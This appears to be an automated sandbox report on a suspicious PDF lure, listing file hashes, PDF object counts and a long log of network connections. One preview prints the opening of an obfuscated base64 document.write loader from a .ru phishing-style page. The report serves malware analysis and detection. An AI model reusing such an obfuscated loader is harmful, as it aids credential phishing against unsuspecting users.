                                                                              SSDEEP:3:yionv//thPlZOE//xl/k4E08up:6v/lhPKk7Tp
                                                                              MD5:C0945816C117637F8AD1D5991FE62706
                                                                              SHA1:314FF5E3A8AB2CEFAEA5C5D2D9B052D8F44B517E
                                                                              SHA-256:4589ED18E03295370F63CA488A7FE42E1FD266905B25C686FA6F4157EF35222D
                                                                              SHA-512:AD9F390D73B164E006E4755ACF5B8150DCA290EFC5FCA56EDC2D8F295BDACECC9085961F80485066F854AE4800EC707DBFC0AF6891E5CBE40828B9C9155673E5
                                                                              Malicious:false
                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cc915a7fc91c407/1727918165138/3p8fPrR4fQOFciC
                                                                              Preview:.PNG........IHDR.......E.......@)....IDAT.....$.....IEND.B`.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 14 x 69, 8-bit/color RGB, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):61
                                                                              Entropy (8bit):4.035372245524405
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPlZOE//xl/k4E08up:6v/lhPKk7Tp
                                                                              MD5:C0945816C117637F8AD1D5991FE62706
                                                                              SHA1:314FF5E3A8AB2CEFAEA5C5D2D9B052D8F44B517E
                                                                              SHA-256:4589ED18E03295370F63CA488A7FE42E1FD266905B25C686FA6F4157EF35222D
                                                                              SHA-512:AD9F390D73B164E006E4755ACF5B8150DCA290EFC5FCA56EDC2D8F295BDACECC9085961F80485066F854AE4800EC707DBFC0AF6891E5CBE40828B9C9155673E5
                                                                              Malicious:false
                                                                              Preview:.PNG........IHDR.......E.......@)....IDAT.....$.....IEND.B`.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, ASCII text, with very long lines (6493), with CRLF line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):17494
                                                                              Entropy (8bit):5.88871991052006
                                                                              Encrypted:false
                                                                              SSDEEP:384:XnuQ5V5ZOQhavwlZoDnuQ5V5ZOQhavwlZoZlrClrg:zV5Z1hOSCHV5Z1hOSCZlrClrg
                                                                              MD5:AF7B15A8ABBDEE5F2C365250F0194DFB
                                                                              SHA1:8E80907D2C553663EA259E73465080DE56EAFE9E
                                                                              SHA-256:EE6524E7232A0A808E81E34248526CBBD314D7EFD8BA87A4B11BF1C87E03DADA
                                                                              SHA-512:64CBF1AC511715C73C0B789532BBE1DAF89218BBDDFFBBB5481B634C9B2106BF50BE411181100CB8499C8C6D2832273FFE69A986C20389B4CFE16EF645E282E8
                                                                              Malicious:false
                                                                              URL:https://ge6j.sisbousim.ru/jREPXBM/
                                                                              Preview:<script>..if("https://Ge6j.sisbousim.ru/jREPXBM/" == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNpYUFzemFrSGZUIGg0e21hcmdpbi10b3A6MDttYXJnaW4
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (47261)
                                                                              Category:downloaded
                                                                              Size (bytes):47262
                                                                              Entropy (8bit):5.3974731018213795
                                                                              Encrypted:false
                                                                              SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                              MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                              SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                              SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                              SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                              Malicious:false
                                                                              URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js
                                                                              Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                              File type:PDF document, version 1.4, 6 pages
                                                                              Entropy (8bit):7.953417480124863
                                                                              TrID:
                                                                              • Adobe Portable Document Format (5005/1) 100.00%
                                                                              File name:Globalfoundries.com_Report_46279.pdf
                                                                              File size:130'720 bytes
                                                                              MD5:a3955fabbc8d8fdb7fe2d33f6b7f4bef
                                                                              SHA1:9e2878acf46a395bfcbe097836a2dfeb2ef6fc21
                                                                              SHA256:3c00ced55d85e11e84fbd8feb78f62c183df957e1859ca3ba9e3f622b0551581
                                                                              SHA512:bb6ee6dd331a5ae71c83a39cf7156813728c0fc93ad01db5d36c586c5fac93e671b2ced68f263f872c45d6b11f28f0b7a0b60d0d5c3e5a28738e3d755c458410
                                                                              SSDEEP:3072:/peajpYtax09O4yaTdiddls/IWunKGF98zy8g:fRcPPdodlwIWne8g
                                                                              TLSH:8ED3F1377128265DE5CE8FD1ED3A3BBD4428F1E69D8555C21C3C42856C8FA01EA6E2E3
                                                                              File Content Preview:%PDF-1.4.............. ! . ..... . . . . . . ........ . [ u6 s B%Lj 4x : ? $G { dOK 5 g 4 ! K, + | ;xU= (M Jx- c (7 R_ L h $K *K\ |F@ n Z w!b f p 2 4|ic A@ a t? W;$K X Q i = z [? u
                                                                              Icon Hash:62cc8caeb29e8ae0

                                                                              General

                                                                              Header:%PDF-1.4Ã\x90
                                                                              Total Entropy:7.953417
                                                                              Total Bytes:130720
                                                                              Stream Entropy:7.994917
                                                                              Stream Bytes:118200
                                                                              Entropy outside Streams:5.406886
                                                                              Bytes outside Streams:12520
                                                                              Number of EOF found:1
                                                                              Bytes after EOF:
                                                                              NameCount
                                                                              obj48
                                                                              endobj48
                                                                              stream20
                                                                              endstream20
                                                                              xref1
                                                                              trailer1
                                                                              startxref1
                                                                              /Page6
                                                                              /Encrypt0
                                                                              /ObjStm0
                                                                              /URI10
                                                                              /JS0
                                                                              /JavaScript0
                                                                              /AA0
                                                                              /OpenAction0
                                                                              /AcroForm0
                                                                              /JBIG2Decode0
                                                                              /RichMedia0
                                                                              /Launch0
                                                                              /EmbeddedFile0

                                                                              Image Streams

                                                                              IDDHASHMD5Preview
                                                                              75814008a2e71150ddffd2c0e6cc6aea96853c4915d669815
                                                                              8d915108a2e74150ddb28a33bc32ba202b841870afaa01cc2
                                                                              9ccb66951755d92cccf499e32211ff16d50335ec937af78b3
                                                                              10cca66d51555d9ac4de8b7b82fbe512741489709345387d27
                                                                              11324d4d8e4c2913804ea52fe5147fbb4f67c068202f9cff95
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 3, 2024 03:13:25.252569914 CEST49675443192.168.2.4173.222.162.32
                                                                              Oct 3, 2024 03:13:31.729733944 CEST49738443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:31.729793072 CEST44349738184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:31.729968071 CEST49738443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:31.731538057 CEST49738443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:31.731563091 CEST44349738184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:32.375972033 CEST44349738184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:32.376130104 CEST49738443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:32.380789042 CEST49738443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:32.380820036 CEST44349738184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:32.381093979 CEST44349738184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:32.422034025 CEST49738443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:32.467487097 CEST49738443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:32.511456013 CEST44349738184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:32.693780899 CEST44349738184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:32.693938017 CEST44349738184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:32.694015980 CEST49738443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:32.694091082 CEST49738443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:32.694139004 CEST44349738184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:32.694173098 CEST49738443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:32.694189072 CEST44349738184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:32.736393929 CEST49739443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:32.736479998 CEST44349739184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:32.736569881 CEST49739443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:32.736980915 CEST49739443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:32.737016916 CEST44349739184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:33.382194042 CEST44349739184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:33.382380009 CEST49739443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:33.711684942 CEST49739443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:33.711714029 CEST44349739184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:33.712685108 CEST44349739184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:33.715276003 CEST49739443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:33.755429029 CEST44349739184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:33.901173115 CEST44349739184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:33.901336908 CEST44349739184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:33.901737928 CEST49739443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:33.903079987 CEST49739443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:33.903127909 CEST44349739184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:33.903160095 CEST49739443192.168.2.4184.28.90.27
                                                                              Oct 3, 2024 03:13:33.903177023 CEST44349739184.28.90.27192.168.2.4
                                                                              Oct 3, 2024 03:13:38.106605053 CEST49742443192.168.2.44.175.87.197
                                                                              Oct 3, 2024 03:13:38.106648922 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:38.106803894 CEST49742443192.168.2.44.175.87.197
                                                                              Oct 3, 2024 03:13:38.107676983 CEST49742443192.168.2.44.175.87.197
                                                                              Oct 3, 2024 03:13:38.107691050 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:38.534821987 CEST49743443192.168.2.423.217.172.185
                                                                              Oct 3, 2024 03:13:38.534905910 CEST4434974323.217.172.185192.168.2.4
                                                                              Oct 3, 2024 03:13:38.535207033 CEST49743443192.168.2.423.217.172.185
                                                                              Oct 3, 2024 03:13:38.535207987 CEST49743443192.168.2.423.217.172.185
                                                                              Oct 3, 2024 03:13:38.535281897 CEST4434974323.217.172.185192.168.2.4
                                                                              Oct 3, 2024 03:13:38.898219109 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:38.898297071 CEST49742443192.168.2.44.175.87.197
                                                                              Oct 3, 2024 03:13:38.901261091 CEST49742443192.168.2.44.175.87.197
                                                                              Oct 3, 2024 03:13:38.901273012 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:38.901669025 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:38.954289913 CEST49742443192.168.2.44.175.87.197
                                                                              Oct 3, 2024 03:13:39.115931034 CEST4434974323.217.172.185192.168.2.4
                                                                              Oct 3, 2024 03:13:39.116244078 CEST49743443192.168.2.423.217.172.185
                                                                              Oct 3, 2024 03:13:39.116265059 CEST4434974323.217.172.185192.168.2.4
                                                                              Oct 3, 2024 03:13:39.117849112 CEST4434974323.217.172.185192.168.2.4
                                                                              Oct 3, 2024 03:13:39.117933035 CEST49743443192.168.2.423.217.172.185
                                                                              Oct 3, 2024 03:13:39.120240927 CEST49743443192.168.2.423.217.172.185
                                                                              Oct 3, 2024 03:13:39.120326996 CEST4434974323.217.172.185192.168.2.4
                                                                              Oct 3, 2024 03:13:39.120440960 CEST49743443192.168.2.423.217.172.185
                                                                              Oct 3, 2024 03:13:39.120457888 CEST4434974323.217.172.185192.168.2.4
                                                                              Oct 3, 2024 03:13:39.173065901 CEST49743443192.168.2.423.217.172.185
                                                                              Oct 3, 2024 03:13:39.221293926 CEST4434974323.217.172.185192.168.2.4
                                                                              Oct 3, 2024 03:13:39.221447945 CEST4434974323.217.172.185192.168.2.4
                                                                              Oct 3, 2024 03:13:39.221513033 CEST49743443192.168.2.423.217.172.185
                                                                              Oct 3, 2024 03:13:39.221863031 CEST49743443192.168.2.423.217.172.185
                                                                              Oct 3, 2024 03:13:39.221885920 CEST4434974323.217.172.185192.168.2.4
                                                                              Oct 3, 2024 03:13:39.221899033 CEST49743443192.168.2.423.217.172.185
                                                                              Oct 3, 2024 03:13:39.221946955 CEST49743443192.168.2.423.217.172.185
                                                                              Oct 3, 2024 03:13:39.602163076 CEST49742443192.168.2.44.175.87.197
                                                                              Oct 3, 2024 03:13:39.615547895 CEST4972380192.168.2.4199.232.214.172
                                                                              Oct 3, 2024 03:13:39.620848894 CEST8049723199.232.214.172192.168.2.4
                                                                              Oct 3, 2024 03:13:39.620909929 CEST4972380192.168.2.4199.232.214.172
                                                                              Oct 3, 2024 03:13:39.643496990 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:39.860162020 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:39.860222101 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:39.860241890 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:39.860260963 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:39.860299110 CEST49742443192.168.2.44.175.87.197
                                                                              Oct 3, 2024 03:13:39.860301971 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:39.860321999 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:39.860338926 CEST49742443192.168.2.44.175.87.197
                                                                              Oct 3, 2024 03:13:39.860349894 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:39.860363007 CEST49742443192.168.2.44.175.87.197
                                                                              Oct 3, 2024 03:13:39.860387087 CEST49742443192.168.2.44.175.87.197
                                                                              Oct 3, 2024 03:13:39.860444069 CEST49742443192.168.2.44.175.87.197
                                                                              Oct 3, 2024 03:13:39.860445976 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:39.860471964 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:39.860507965 CEST49742443192.168.2.44.175.87.197
                                                                              Oct 3, 2024 03:13:39.860722065 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:39.860755920 CEST49742443192.168.2.44.175.87.197
                                                                              Oct 3, 2024 03:13:39.860807896 CEST49742443192.168.2.44.175.87.197
                                                                              Oct 3, 2024 03:13:40.551459074 CEST49742443192.168.2.44.175.87.197
                                                                              Oct 3, 2024 03:13:40.551459074 CEST49742443192.168.2.44.175.87.197
                                                                              Oct 3, 2024 03:13:40.551500082 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:40.551542044 CEST443497424.175.87.197192.168.2.4
                                                                              Oct 3, 2024 03:13:51.790935993 CEST49753443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:51.790991068 CEST44349753104.18.246.141192.168.2.4
                                                                              Oct 3, 2024 03:13:51.791213989 CEST49753443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:51.791614056 CEST49754443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:51.791624069 CEST44349754104.18.246.141192.168.2.4
                                                                              Oct 3, 2024 03:13:51.791697979 CEST49754443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:51.791831017 CEST49753443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:51.791851044 CEST44349753104.18.246.141192.168.2.4
                                                                              Oct 3, 2024 03:13:51.791970968 CEST49754443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:51.791981936 CEST44349754104.18.246.141192.168.2.4
                                                                              Oct 3, 2024 03:13:52.262406111 CEST44349754104.18.246.141192.168.2.4
                                                                              Oct 3, 2024 03:13:52.262687922 CEST49754443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:52.262722015 CEST44349754104.18.246.141192.168.2.4
                                                                              Oct 3, 2024 03:13:52.264149904 CEST44349754104.18.246.141192.168.2.4
                                                                              Oct 3, 2024 03:13:52.264211893 CEST49754443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:52.272670031 CEST44349753104.18.246.141192.168.2.4
                                                                              Oct 3, 2024 03:13:52.276066065 CEST49754443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:52.276215076 CEST44349754104.18.246.141192.168.2.4
                                                                              Oct 3, 2024 03:13:52.276299000 CEST49753443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:52.276308060 CEST44349753104.18.246.141192.168.2.4
                                                                              Oct 3, 2024 03:13:52.276659966 CEST49754443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:52.276674032 CEST44349754104.18.246.141192.168.2.4
                                                                              Oct 3, 2024 03:13:52.279517889 CEST44349753104.18.246.141192.168.2.4
                                                                              Oct 3, 2024 03:13:52.279592037 CEST49753443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:52.280710936 CEST49753443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:52.280872107 CEST44349753104.18.246.141192.168.2.4
                                                                              Oct 3, 2024 03:13:52.316415071 CEST49754443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:52.328973055 CEST49753443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:52.328989029 CEST44349753104.18.246.141192.168.2.4
                                                                              Oct 3, 2024 03:13:52.378746033 CEST49753443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:52.803294897 CEST44349754104.18.246.141192.168.2.4
                                                                              Oct 3, 2024 03:13:52.803396940 CEST44349754104.18.246.141192.168.2.4
                                                                              Oct 3, 2024 03:13:52.803879023 CEST49754443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:52.803906918 CEST44349754104.18.246.141192.168.2.4
                                                                              Oct 3, 2024 03:13:52.803925037 CEST49754443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:52.803963900 CEST49754443192.168.2.4104.18.246.141
                                                                              Oct 3, 2024 03:13:52.936027050 CEST49755443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:52.936078072 CEST44349755192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:52.936183929 CEST49755443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:52.936408043 CEST49755443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:52.936450005 CEST44349755192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:53.451646090 CEST44349755192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:53.466032982 CEST49755443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:53.466094971 CEST44349755192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:53.469568014 CEST44349755192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:53.469707966 CEST49755443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:53.477943897 CEST49755443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:53.478142023 CEST44349755192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:53.478187084 CEST49755443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:53.519491911 CEST49755443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:53.519550085 CEST44349755192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:53.565639019 CEST49755443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:53.608423948 CEST44349755192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:53.608491898 CEST44349755192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:53.608562946 CEST49755443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:53.655186892 CEST49755443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:53.655210018 CEST44349755192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:53.696780920 CEST49756443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:53.696810007 CEST44349756192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:53.696913958 CEST49756443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:53.697096109 CEST49756443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:53.697103977 CEST44349756192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:53.822827101 CEST49759443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:53.822901964 CEST44349759188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:53.823223114 CEST49759443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:53.823326111 CEST49760443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:53.823378086 CEST44349760188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:53.823662043 CEST49760443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:53.823662996 CEST49759443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:53.823784113 CEST44349759188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:53.824002028 CEST49760443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:53.824028969 CEST44349760188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:54.196234941 CEST44349756192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:54.196559906 CEST49756443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:54.196574926 CEST44349756192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:54.197185040 CEST44349756192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:54.197478056 CEST49756443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:54.197551012 CEST44349756192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:54.197618961 CEST49756443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:54.243423939 CEST44349756192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:54.286268950 CEST44349759188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:54.289238930 CEST49759443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.289268970 CEST44349759188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:54.290807009 CEST44349759188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:54.290908098 CEST49759443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.293608904 CEST49759443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.293699980 CEST44349759188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:54.293889999 CEST49759443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.293908119 CEST44349759188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:54.293991089 CEST49759443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.294022083 CEST49759443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.294477940 CEST49761443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.294542074 CEST44349761188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:54.294629097 CEST49761443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.296044111 CEST49761443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.296065092 CEST44349761188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:54.303086996 CEST44349760188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:54.303431988 CEST49760443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.303447008 CEST44349760188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:54.306917906 CEST44349760188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:54.307005882 CEST49760443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.307447910 CEST49760443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.307478905 CEST49760443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.307523966 CEST49760443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.307539940 CEST44349760188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:54.307609081 CEST49760443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.307945967 CEST49762443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.307971001 CEST44349762188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:54.308049917 CEST49762443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.308259010 CEST49762443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.308288097 CEST44349762188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:54.340524912 CEST44349756192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:54.340603113 CEST44349756192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:54.340661049 CEST49756443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:54.341722965 CEST49756443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:54.341736078 CEST44349756192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:54.472861052 CEST49763443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:54.472894907 CEST44349763192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:54.472960949 CEST49763443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:54.473162889 CEST49763443192.168.2.4192.185.163.42
                                                                              Oct 3, 2024 03:13:54.473170042 CEST44349763192.185.163.42192.168.2.4
                                                                              Oct 3, 2024 03:13:54.774219990 CEST44349761188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:54.774595976 CEST49761443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:54.774662971 CEST44349761188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:54.775015116 CEST44349762188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:54.775182009 CEST49762443192.168.2.4188.114.96.3
